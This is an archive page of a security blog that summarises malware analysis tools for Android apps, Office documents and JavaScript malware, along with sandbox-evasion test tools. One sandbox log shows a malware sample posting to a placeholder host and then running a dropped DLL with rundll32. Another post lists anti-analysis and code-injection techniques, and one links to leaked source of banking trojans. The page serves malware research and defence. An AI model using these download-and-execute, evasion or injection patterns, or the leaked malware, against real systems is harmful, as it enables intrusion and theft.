Security of Information, Threat Intelligence, Hacking, Offensive Security, Pentest, Open Source, Hackers Tools, Leaks, Pr1v8, Premium Courses Free, etc

  • Penetration Testing Distribution - BackBox

    BackBox is a penetration test and security assessment oriented Ubuntu-based Linux distribution providing a network and informatic systems analysis toolkit. It includes a complete set of tools required for ethical hacking and security testing...
  • Pentest Distro Linux - Weakerth4n

    Weakerth4n is a penetration testing distribution which is built from Debian Squeeze.For the desktop environment it uses Fluxbox...
  • The Amnesic Incognito Live System - Tails

    Tails is a live system that aims to preserve your privacy and anonymity. It helps you to use the Internet anonymously and circumvent censorship...
  • Penetration Testing Distribution - BlackArch

    BlackArch is a penetration testing distribution based on Arch Linux that provides a large amount of cyber security tools. It is an open-source distro created specially for penetration testers and security researchers...
  • The Best Penetration Testing Distribution - Kali Linux

    Kali Linux is a Debian-based distribution for digital forensics and penetration testing, developed and maintained by Offensive Security. Mati Aharoni and Devon Kearns rewrote BackTrack...
  • Friendly OS designed for Pentesting - ParrotOS

    Parrot Security OS is a cloud friendly operating system designed for Pentesting, Computer Forensic, Reverse engineering, Hacking, Cloud pentesting...
Showing posts with label Malware Analysis. Show all posts
Showing posts with label Malware Analysis. Show all posts

Saturday, January 20, 2018

Advance Android Malware Analysis Framework - Droidefense




Droidefense (originally named atom: analysis through observation machine)* is the codename for android apps/malware analysis/reversing tool. It was built focused on security issues and tricks that malware researcher have on they every day work. For those situations on where the malware has anti-analysis routines, Droidefense attemps to bypass them in order to get to the code and 'bad boy' routine. Sometimes those techniques can be virtual machine detection, emulator detection, self certificate checking, pipes detection. tracer pid check, and so on.
Droidefense uses an innovative idea in where the code is not decompiled rather than viewed. This allow us to get the global view of the execution workflow of the code with a 100% accuracy on gathered information. With this situation, Droidefense generates a fancy html report with the results for an easy understanding.

Usage

TL;DR
java -jar droidefense-cli-1.0-SNAPSHOT.jar -i /path/to/your/sample.apk

Detailed usage
java -jar droidefense-cli-1.0-SNAPSHOT.jar

________               .__    .___      _____                            
\______ \_______  ____ |__| __| _/_____/ ____\____   ____   ______ ____  
 |    |  \_  __ \/  _ \|  |/ __ |/ __ \   __\/ __ \ /    \ /  ___// __ \ 
 |    `   \  | \(  <_> )  / /_/ \  ___/|  | \  ___/|   |  \\___ \\  ___/ 
/_______  /__|   \____/|__\____ |\___  >__|  \___  >___|  /____  >\___  >
        \/                     \/    \/          \/     \/     \/     \/ 


 * Current build:    2017_12_05__12_07_01
 * Check out on Github:    https://github.com/droidefense/
 * Report your issue:    https://github.com/droidefense/engine/issues
 * Lead developer:    @zerjioang

usage: droidefense
 -d,--debug                 print debugging information
 -h,--help                  print this message
 -i,--input <apk>           input .apk to be analyzed
 -o,--output <format>       select prefered output:
                            json
                            json.min
                            html
 -p,--profile               Wait for JVM profiler
 -s,--show                  show generated report after scan
 -u,--unpacker <unpacker>   select prefered unpacker:
                            zip
                            memapktool
 -v,--verbose               be verbose
 -V,--version               show current version information
 

Useful info



Share:

Saturday, October 28, 2017

Tool to Detect Sandboxes and Analysis Environments in the Same Way as Malware Families Do - Pafish


Pafish is a demonstration tool that employs several techniques to detect sandboxes and analysis environments in the same way as malware families do.
The project is open source, you can read the code of all anti-analysis checks.

Scope
The objective of this project is to collect usual tricks seen in malware samples. This allows us to study them, and test if our analysis environments are properly implemented.

Build
Pafish is written in C and can be built with MinGW (gcc + make).
Check out "How to build" for detailed instructions.

Author
Alberto Ortega (@a0rtega - profile)

You can also download the executable of the latest stable version.

Share:

Saturday, May 27, 2017

Tools to analyze MS OLE2 files and MS Office documents, for malware analysis, forensics and debugging - oletools



oletools is a package of python tools to analyze Microsoft OLE2 files (also called Structured Storage, Compound File Binary Format or Compound Document File Format), such as Microsoft Office documents or Outlook messages, mainly for malware analysis, forensics and debugging. It is based on the olefile parser. See http://www.decalage.info/python/oletools for more info.


News
  • 2016-11-01 v0.50: all oletools now support python 2 and 3.
    • olevba: several bugfixes and improvements.
    • mraptor: improved detection, added mraptor_milter for Sendmail/Postfix integration.
    • rtfobj: brand new RTF parser, obfuscation-aware, improved display, detect executable files in OLE Package objects.
    • setup: now creates handy command-line scripts to run oletools from any directory.
  • 2016-06-10 v0.47: olevba added PPT97 macros support, improved handling of malformed/incomplete documents, improved error handling and JSON output, now returns an exit code based on analysis results, new --relaxed option. rtfobj: improved parsing to handle obfuscated RTF documents, added -d option to set output dir. Moved repository and documentation to GitHub.
  • 2016-04-19 v0.46: olevba does not deobfuscate VBA expressions by default (much faster), new option --deobf to enable it. Fixed color display bug on Windows for several tools.
  • 2016-04-12 v0.45: improved rtfobj to handle several anti-analysis tricks, improved olevba to export results in JSON format.
See the full changelog for more information.

Tools:
  • olebrowse: A simple GUI to browse OLE files (e.g. MS Word, Excel, Powerpoint documents), to view and extract individual data streams.
  • oleid: to analyze OLE files to detect specific characteristics usually found in malicious files.
  • olemeta: to extract all standard properties (metadata) from OLE files.
  • oletimes: to extract creation and modification timestamps of all streams and storages.
  • oledir: to display all the directory entries of an OLE file, including free and orphaned entries.
  • olemap: to display a map of all the sectors in an OLE file.
  • olevba: to extract and analyze VBA Macro source code from MS Office documents (OLE and OpenXML).
  • MacroRaptor: to detect malicious VBA Macros
  • pyxswf: to detect, extract and analyze Flash objects (SWF) that may be embedded in files such as MS Office documents (e.g. Word, Excel) and RTF, which is especially useful for malware analysis.
  • oleobj: to extract embedded objects from OLE files.
  • rtfobj: to extract embedded objects from RTF files.
  • and a few others (coming soon)

Projects using oletools:
oletools are used by a number of projects and online malware analysis services, including Viper, REMnux, FAME, Hybrid-analysis.com, Joe Sandbox, Deepviz, Laika BOSS, Cuckoo Sandbox, Anlyz.io, ViperMonkey, pcodedmp, dridex.malwareconfig.com, and probably VirusTotal. (Please contact me if you have or know a project using oletools)

Download and Install:
The recommended way to download and install/update the latest stable release of oletools is to use pip:
  • On Linux/Mac:  Sudo -H pip install -U oletools
  • On Windows:  Pip install -U oletools 
This should automatically create command-line scripts to run each tool from any directory: olevba, mraptor, rtfobj, etc.
To get the latest development version instead:
  • On Linux/Mac: sudo -H pip install -U https://github.com/decalage2/oletools/archive/master.zip
  • On Windows: pip install -U https://github.com/decalage2/oletools/archive/master.zip
See the documentation for other installation options.

Documentation:
The latest version of the documentation can be found online, otherwise a copy is provided in the doc subfolder of the package.



Share:

Friday, January 27, 2017

Collections of Malware source code - Leaked



This is leaked source code of Malwares.

Obs, I am not responsible for your actions

Source from:

http://www.malwaretech.com/p/sources.html Dexter v2 (Point of Sales Trojan) Rovnix (Bootkit) Carberp (Banking Trojan) Tinba (Tiny ASM Banking Trojan) Zeus (Banking Trojan) KINS (Banking Trojan) Dendroid (Android Trojan) Grum (Spam Bot) Pony 2.0 (Stealer) Alina Spark (Point of Sales Trojan) RIG Front-end (Exploit Kit)




Share:

Monday, September 12, 2016

Simple Static Malware Analyzer - SSMA



SSMA is a simple malware analyzer written in Python 3.

Features:
  • Searches for websites, e-mail addresses, IP addresses in the strings of the file.
  • Looks for Windows functions commonly used by malware.
  • Get results from VirusTotal and/or upload files.
  • Malware detection based on Yara-rules - https://virustotal.github.io/yara/
  • Detect well-known software packers.
  • Detect the existence of cryptographic algorithms.
  • Detect anti-debug and anti-virtualization techniques used by malware to evade automated analysis.
  • Find if documents have been crafted to leverage malicious code.

Usage
git clone https://github.com/secrary/SSMA

cd SSMA

sudo pip3 install -r requirements.txt

python3 ssma.py -h
Additional: ssdeep - Installation
More: Simple Static Malware Analyzer


Share:

Sunday, July 24, 2016

Reverse engineering, Malware analysis of Android applications - Androguard



Reverse engineering, Malware and goodware analysis of Android applications ... and more (ninja !)

Features
Androguard is a full python tool to play with Android files.
  •  Map and manipulate DEX/ODEX/APK/AXML/ARSC format into full Python objects, 
  •  Diassemble/Decompilation/Modification of DEX/ODEX/APK format, 
  •  Decompilation with the first native (directly from dalvik bytecodes to java source codes) dalvik decompiler (DAD), 
  •  Access to the static analysis of the code (basic blocks, instructions, permissions (with database from http://www.android-permissions.org/) ...) and create your own static analysis tool, 
  •  Analysis a bunch of android apps, 
  •  Analysis with ipython/Sublime Text Editor, 
  •  Diffing of android applications, 
  •  Measure the efficiency of obfuscators (proguard, ...), 
  •  Determine if your application has been pirated (plagiarism/similarities/rip-off indicator), 
  •  Check if an android application is present in a database (malwares, goodwares ?), 
  •  Open source database of android malware (this opensource database is done on my free time, of course my free time is limited, so if you want to help, you are welcome !), 
  •  Detection of ad/open source librairies (WIP), 
  •  Risk indicator of malicious application, 
  •  Reverse engineering of applications (goodwares, malwares), 
  •  Transform Android's binary xml (like AndroidManifest.xml) into classic xml, 
  •  Visualize your application with gephi (gexf format), or with cytoscape (xgmml format), or PNG/DOT output, 
  •  Integration with external decompilers (JAD+dex2jar/DED/fernflower/jd-gui...) 

1. ScreenShots













Share:

Sunday, July 10, 2016

OpenSource /Malware Analysis Pipeline System - Aleph





What?

Aleph is designed to pipeline the analysis of malware samples. It has a series of collectors that will gather samples from many sources and shove them into the pipeline. The sample manager has a series of plugins that are ran against the sample and returns found data into JSON form.

These JSON data can be further processed and queried in a objective manner instead of grepping and regexing.

How?

The main Aleph daemon is a loose-coupled python application and library. These are composed by the Aleph Service that spawns:

1.The Collectors. These are responsible for going to multiple sources (Filesystem folder, IMAP folder, FTP directory etc) and collect all the files there, store locally and add them to the processing queue. Each collector runs in its own process (fork).

2.Multiple (quantity is configurable) parallel SampleManager services (that will pull samples from the work queue and process them) and run the plugins that receives the sample path and return the JSON object of found artifacts.

3.The sample object is converted to JSON along with its data and is stored into an Elasticsearch backend.

Installing Aleph

Requirements

In order to get a clean and nice install, you should download some requirements: Ubuntu/Debian


apt-get install python-pyrex libffi-dev libfuzzy-dev python-dateutil libsqlite3-dev


ElasticSearch

First if you don't have an Elasticsearch instance ready, you must install one.
For Debian/Ubuntu/Redhat/Fedora/CentOS (yum + apt basically) users, follow this guide.
** Remember: Elasticsearh uses JVM, so you also must install it =) **

Python modules

We strongly suggest that you use python's virtual environment so you don't pollute the rest of your OS installation with python modules. To make a contained virtual environment, install virtualenv with pip:


pip install virtualenv

Go to the desired Aleph installation folder and type the following to create and activate your virtual environment:


virtualenv venv # 'venv' can be any name

source venv/bin/activate

There will be the environment name (venv) appended to your PS1 variable:


(venv)(2014-08-19 17:36:%)(~/opt/aleph/)

All python modules required are listed on the requirements.txt file on the root repository folder. You can install all of them at once using pip:


pip install -r requirements.txt

Then clone the repository and copy the settings file:


git clone https://github.com/merces/aleph.git --branch aleph-python --single-branch .

cp aleph/settings.py.orig aleph/settings.py

Edit settings.py and add a local source (a folder where Aleph will search for samples - WARNING: ALEPH WILL MOVE THE SAMPLE THUS REMOVING FROM THE ORIGINAL FOLDER) The folder must exists as Aleph won't try to create them


SAMPLE_SOURCES = [

    ('local', {'path': '/opt/aleph/unprocessed_samples'}),

]

Review your Elasticsearch installation URI


ELASTICSEARCH_URI = '127.0.0.1:9200'

** Workaround step ** As I still finish some of the code, there are some folders that are not on the repository and must be created manually and set accordingly on the settings.py file:


SAMPLE_TEMP_DIR = '/opt/aleph/temp'

SAMPLE_STORAGE_DIR = '/opt/aleph/samples'

Remember to verify folders permissioning. And Aleph is ready to run!

Running

Go to Aleph folder, activate the virtual environment and run the bin/aleph-server.py as following:


cd /opt/aleph/

source venv/bin/activate

./bin/aleph-server.py

And that's it. Check your logs under log/aleph.log to any troubleshooting.

Install the Web interface(Webui)

Edit the "SERVER_NAME" constant at your settings.py file. ex: SERVER_NAME = 'mydomain.com:90'
then create the following entry:


SECRET_KEY = 'Pu7s0m3cryp7l337here' #do not use this ;)

SAMPLE_SUBMIT_FOLDER= '/some/path' #where samples will be submitted from webui

Setup your database:


python bin/db_create.py

Run the webui script:


bin/aleph-webui.sh

To access your webinterface open your favorite browser at http://SERVER_NAME #That value you changed before.


Login: admin

Password: changeme12!

Note: For sake of Security's God, CHANGE YOUR PASSWORD! ;)

But if you do not like our webinterface you still can use other softwares to review and query data on elasticsearch. I strongly suggest this Chrome REST client plugin or the great Kibana

Currently implemented

Collectors

ºFileCollector: grabs samples from a local directory
ºMailCollector: grabs samples from email attachments on a IMAP folder

Plugins

ºPEInfo : extracts info from PE files such as entrypoint, number of sections and some PE characteristics(SEH/ASLR/DEP).
ºZipArchivePlugin: extracts zip files and puts their contents back into analysis queue.
ºStringsPlugin: extracts strings from sample into three categories: All Strings, URI Strings and Filename Strings (not 100% but we do our best).
ºVirustotalPlugin: check a sample SHA256 hash against Virustotal database and get the report. If that hash doesnt exist, send the file to analise.
ºTrID: check the filetype of a sample.

Share:

Tuesday, April 5, 2016

Public Malware Techniques Used In The Wild - Al-Khaser




al-khaser is a PoC malware with good intentions that aimes to stress your anti-malware system. It performs a bunch of nowadays malwares tricks and the goal is to see if you catch them all.

Possible uses
  • You are making an anti-debug plugin and you want to check its effectiveness.
  • You want to ensure that your sandbox solution is hidden enough.
  • Or you want to ensure that your malware analysis environement is well hidden.
Please, if you encounter any of the anti-analysis tricks which you have seen in a malware, don't hesitate to contribute.

Features

Anti-debugging attacks
  • IsDebuggerPresent
  • CheckRemoteDebuggerPresent
  • Process Environement Block (BeingDebugged)
  • Process Environement Block (NtGlobalFlag)
  • ProcessHeap (Flags)
  • ProcessHeap (ForceFlags)
  • NtQueryInformationProcess (ProcessDebugPort)
  • NtQueryInformationProcess (ProcessDebugFlags)
  • NtQueryInformationProcess (ProcessDebugObject)
  • NtSetInformationThread (HideThreadFromDebugger)
  • NtQueryObject (ObjectTypeInformation)
  • NtQueryObject (ObjectAllTypesInformation)
  • CloseHanlde (NtClose) Invalide Handle
  • UnhandledExceptionFilter
  • OutputDebugString (GetLastError())
  • Hardware Breakpoints (SEH / GetThreadContext)
  • Software Breakpoints (INT3 / 0xCC)
  • Memory Breakpoints (PAGE_GUARD)
  • Interrupt 0x2d
  • Interrupt 1
  • Parent Process (Explorer.exe)
  • SeDebugPrivilege (Csrss.exe)
  • NtYieldExecution / SwitchToThread

Anti-virtualization
  • Virtualbox registry key values artifacts:
    • "HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0 (Identifier)
    • HARDWARE\Description\System (SystemBiosVersion)
    • HARDWARE\Description\System (VideoBiosVersion)
    • HARDWARE\Description\System (SystemBiosDate)
  • Virtualbox registry Keys artifacts
    • "HARDWARE\ACPI\RSDT\VBOX__"
    • "HARDWARE\ACPI\FADT\VBOX__"
    • "HARDWARE\ACPI\RSDT\VBOX__"
    • "SOFTWARE\Oracle\VirtualBox Guest Additions"
    • "SYSTEM\ControlSet001\Services\VBoxGuest"
    • "SYSTEM\ControlSet001\Services\VBoxMouse"
    • "SYSTEM\ControlSet001\Services\VBoxService"
    • "SYSTEM\ControlSet001\Services\VBoxSF"
    • "SYSTEM\ControlSet001\Services\VBoxVideo"
  • Virtualbox file system artifacts:
    • "system32\drivers\VBoxMouse.sys"
    • "system32\drivers\VBoxGuest.sys"
    • "system32\drivers\VBoxSF.sys"
    • "system32\drivers\VBoxVideo.sys"
    • "system32\vboxdisp.dll"
    • "system32\vboxhook.dll"
    • "system32\vboxmrxnp.dll"
    • "system32\vboxogl.dll"
    • "system32\vboxoglarrayspu.dll"
    • "system32\vboxoglcrutil.dll"
    • "system32\vboxoglerrorspu.dll"
    • "system32\vboxoglfeedbackspu.dll"
    • "system32\vboxoglpackspu.dll"
    • "system32\vboxoglpassthroughspu.dll"
    • "system32\vboxservice.exe"
    • "system32\vboxtray.exe"
    • "system32\VBoxControl.exe"
  • Virtualbox directories artifacts:
    • "oracle\virtualbox guest additions\"
  • Virtualbox MAC Address:
    • "\x08\x00\x27"
  • Virtualbox virtual devices:
    • "\\.\VBoxMiniRdrDN"
    • "\\.\VBoxGuest"
    • "\\.\pipe\VBoxMiniRdDN"
    • "\\.\VBoxTrayIPC"
    • "\\.\pipe\VBoxTrayIPC")
  • Virtualbox Windows Class
    • VBoxTrayToolWndClass
    • VBoxTrayToolWnd
  • Virtualbox network share
    • VirtualBox Shared Folders
  • Virtualbox process list
    • vboxservice.exe
    • vboxtray.exe

Anti Dumping
  • Erase PE header from memory

Code/DLL Injections techniques
  • CreateRemoteThread
  • SetWindowsHooksEx
  • NtCreateThreadEx
  • RtlCreateUserThread
  • APC (QueueUserAPC / NtQueueApcThread)
  • RunPE (GetThreadContext / SetThreadContext)

Timing Attacks
  • Sleep -> SleepEx -> NtDelayExecution
  • SetTimer (Standard Windows Timers)
  • timeSetEvent (Multimedia Timers)


Share:

Thursday, March 10, 2016

Sandbox for semi-automatic Javascript malware analysis and payload extraction - Malware-Jail




Sandbox for semi-automatic Javascript malware analysis and payload extraction. Written for Node.js
malware-jail is written for Node's 'vm' sandbox . Currently implements WScript (Windows Scripting Host) context env/wscript.js , at least the part frequently used by malware. Internet browser context is partialy implemented env/browser.js .

Runs on any operating system, tested on Linux (Node v4.2.1).

Prerequisites

You'll need Node.js and npm .
malware-jail requires minimist , and xmlhttprequest and entities npm packages, you may install them with:


npm install

or


npm install minimist xmlhttprequest entities

Warning
Be careful when working with a real malware. A malware, which is aware of this sandbox, may try to escape and harm your PC. It's recommended you run it either from an unpriviledged Linux account or from within virtualized Windows machine. Angler files in the malware folder are NOT disarmed.

Usage


bash@linux# node jailme.js -h
11 Jan 00:07:39 - Malware sandbox ver. 0.2
11 Jan 00:07:39 - ------------------------
11 Jan 00:07:39 - Usage: node jailme.js [[-e file1] [-e file2] .. ] [-o ofile] [-s odir] [--down=y] [malware1 [malware2] .. ]
11 Jan 00:07:39 - -e ifile ... js that simulates specific environment
11 Jan 00:07:39 - -o ofile ... name of the file where sandbox shall be dumped at the end
11 Jan 00:07:39 - -s odir ... output directory for generated files (malware payload)
11 Jan 00:07:39 - --down=y ... use http request to download malware components automatically
11 Jan 00:07:39 - malware ... js with the malware code
11 Jan 00:07:39 - If no arguments are specified the default values are taken from config.json

In the examples folder you may find a deactivated malware file. Run the analysis with:


node jailme.js malware/example.js

or just simply:


node jailme.js

Internet browser based malware you may test with


node jailme.js malware/example_browser.js

The malware/example.js is the default malware file configured in config.json.
After analysis the complete sandbox context is dumped to a file 'sandbox_dump_after.json'. There you may find:
  • _eval_calls - array of all eval() calls arguments. Useful if eval() is used for deobfucation.
  • _wscript_saved_files - content of all files that the malware attempted to drop. The actual files are saved to the output/ directory too.
  • _wscript_urls - all URLs that the malware intended to GET or POST.
  • _wscript_objects - WScript or ActiveX objects created.
_'sandbox_dump_after.json' uses JSONPath , implemented by JSON-js/cycle.js , to save duplicated or cyclic references to a same object.

Sample output


bash@linux# node jailme.js malware/example.js
11 Jan 00:06:24 - Malware sandbox ver. 0.2
11 Jan 00:06:24 - ------------------------
11 Jan 00:06:24 - Sandbox environment sequence: env/eval.js,env/wscript.js
11 Jan 00:06:24 - Malware files: malware/example.js
11 Jan 00:06:24 - Output file for sandbox dump: sandbox_dump_after.json
11 Jan 00:06:24 - Output directory for generated files: output/
11 Jan 00:06:24 - ==> Preparing Sandbox environment.
11 Jan 00:06:24 - => Executing: env/eval.js
11 Jan 00:06:24 - Preparing sandbox to intercept eval() calls.
11 Jan 00:06:24 - => Executing: env/wscript.js
11 Jan 00:06:24 - Preparing sandbox to emulate WScript environment.
11 Jan 00:06:24 - ==> Executing malware file(s).
11 Jan 00:06:24 - => Executing: malware/example.js
11 Jan 00:06:24 - ActiveXObject(WScript.Shell)
11 Jan 00:06:24 - Created: WScript.Shell[1]
11 Jan 00:06:24 - WScript.Shell[1].ExpandEnvironmentStrings(%TEMP%)
11 Jan 00:06:24 - ActiveXObject(MSXML2.XMLHTTP)
11 Jan 00:06:24 - Created: MSXML2.XMLHTTP[2]
11 Jan 00:06:24 - MSXML2.XMLHTTP[2].open(POST,http://EXAMPLE.COM/redir.php,false)
11 Jan 00:06:24 - MSXML2.XMLHTTP[2].setRequestHeader(Content-Type, application/x-www-form-urlencoded)
11 Jan 00:06:24 - MSXML2.XMLHTTP[2].send(iTlOlnxhMXnM=0.588860877091065&jndj=IT0601)
11 Jan 00:06:24 - MSXML2.XMLHTTP[2] Not sending data, if you want to interract with remote server, set --down=y
11 Jan 00:06:24 - MSXML2.XMLHTTP[2] Calling onreadystatechange() with dummy data
11 Jan 00:06:24 - ActiveXObject(ADODB.Stream)
11 Jan 00:06:24 - Created: ADODB_Stream[3]
11 Jan 00:06:24 - ADODB_Stream[3].Open()
11 Jan 00:06:24 - ADODB_Stream[3].Write(str) - 10001 bytes
11 Jan 00:06:24 - ADODB_Stream[3].SaveToFile(%TEMP%\57020551.dll, 2)
11 Jan 00:06:24 - WScript.Shell[1].Exec(rundll32 %TEMP%\57020551.dll, DllRegisterServer)
11 Jan 00:06:24 - ADODB_Stream[3].Close()
11 Jan 00:08:42 - ==> Script execution finished, dumping sandbox environment to a file.
11 Jan 00:08:42 - Saving: output/_TEMP__49629482.dll
11 Jan 00:08:42 - Saving: output/_TEMP__38611354.pdf
11 Jan 00:08:42 - Generated file saved
11 Jan 00:08:42 - Generated file saved
11 Jan 00:08:42 - The sandbox context has been saved to: sandbox_dump_after.json


In the above example the payload has been extracted into output/_TEMP__49629482.dll and output/_TEMP__38611354.pdf

Example: Analysing Angler EK

Download and extract Angler EK from a pcap file at ANGLER EK SENDS CRYPTOWALL into a malware/angler_full.html .
Strip the non Angler part and save as malware/angler_stripped.html .
Remove <script> tags and convert required <div> tags into:


document._addElementById(id, content);

and save as malware/angler.js .
Run the analysis:


node jailme.js malware/angler.js

Eventually capture the output:


node jailme.js malware/angler.js > angler_log.txt



Share:

Sunday, March 6, 2016

Directory with various materials for studies hacking




Obs, I am not responsible by your act with hacking materials, the materials is responsibility the student 

Directory with various materials for studies hacking, reverse engineering, malware, PenTest tools etc.

By OffensiveSec

Share:

Saturday, February 20, 2016

A Virtual Machine For Assessing Android applications, Reverse Engineering and Malware Analysis - AndroL4b




AndroL4b is an android security virtual machine based on ubuntu Mate includes the collection of latest framework, tutorials and labs from different security geeks and researcher for reverse engineering and malware analysis.


Tools



Share:
Copyright © Offensive Sec Blog | Powered by OffensiveSec
Design by OffSec | Theme by Nasa Records | Distributed By Pirate Edition